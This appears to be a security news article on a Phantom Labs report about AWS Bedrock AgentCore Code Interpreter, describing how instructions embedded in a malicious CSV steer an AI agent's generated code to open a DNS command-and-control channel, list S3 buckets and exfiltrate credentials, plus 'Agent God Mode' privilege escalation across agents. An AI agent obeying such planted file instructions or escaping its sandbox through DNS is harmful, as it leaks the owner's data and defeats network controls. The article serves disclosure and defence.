🎯There's a flaw in AWS Bedrock that lets bad guys sneak out sensitive data through DNS. They can also take advantage of weak security settings to gain control over other agents, making it super important for companies to tighten their security.
The Flaw
A recent report from Phantom Labs Research has unveiled a serious security flaw in the AWS Bedrock AgentCore Code Interpreter. This vulnerability allows attackers to exfiltrate sensitive data from AI-powered environments using DNS queries. The flaw exists in how the Code Interpreter processes malicious files, enabling a covert command-and-control channel. Even when network access is restricted, the DNS resolution capability remains active, presenting a significant risk.
The attack begins with the creation of a malicious CSV file. When processed by the AI agent, the embedded instructions can alter the generated Python code. Instead of executing standard tasks, the code communicates with an external server via DNS requests. This method allows attackers to execute commands, list Amazon S3 buckets, and even extract sensitive information like credentials and personal data.
What's at Risk
The implications of this vulnerability are profound, especially for organizations using AWS Bedrock. If Code Interpreter instances are assigned overly permissive IAM roles, the risk escalates. Some configurations might inherit roles designed for other services, granting broader access than necessary. For instance, the default AgentCore Starter Toolkit role can provide full access to DynamoDB and Secrets Manager, potentially leading to severe data breaches.
New findings have introduced a concept referred to as Agent God Mode, where the overly broad IAM permissions effectively grant an individual agent the ability to escalate privileges and compromise every other AgentCore agent within the AWS account. This configuration creates a multi-stage attack chain, allowing an attacker to exfiltrate proprietary ECR images, access other agents’ memories, and invoke every code interpreter.
Experts warn that the 'Sandbox' mode in AWS Bedrock does not guarantee complete isolation from external networks. This oversight could allow attackers to exploit the system, leading to unauthorized data access and exfiltration. Organizations must recognize the limitations of current security measures in cloud environments.
AWS Response and Security Recommendations
In response to the findings, AWS has stated that the behavior observed reflects intended functionality rather than a vulnerability. Instead of issuing a patch, AWS updated its documentation to clarify that Sandbox Mode allows limited external network access, including DNS resolution. This means organizations must adapt their security strategies accordingly.
To mitigate risks, administrators should inventory all active AgentCore Code Interpreter instances. It's crucial to migrate any instances handling critical data from Sandbox mode to VPC mode, which offers better isolation from external threats. Additionally, organizations are advised to create custom, least-privilege IAM roles for production agents, as the default roles generated by the starter toolkit are not suitable for production environments.
Broader Implications
The research highlights a broader challenge as AI systems become more capable of executing code and interacting with infrastructure. Without strict permission boundaries and network controls, automated agents may inadvertently expose sensitive data. As AI continues to evolve, organizations must remain vigilant and reassess their security frameworks to protect against emerging threats.
This vulnerability serves as a stark reminder of the complexities involved in securing cloud environments, particularly when AI systems are involved. Organizations must prioritize robust security measures to safeguard their data and maintain trust in cloud services.
The discovery of the Agent God Mode highlights the need for organizations to implement strict IAM policies and reassess their security posture when using AWS Bedrock.
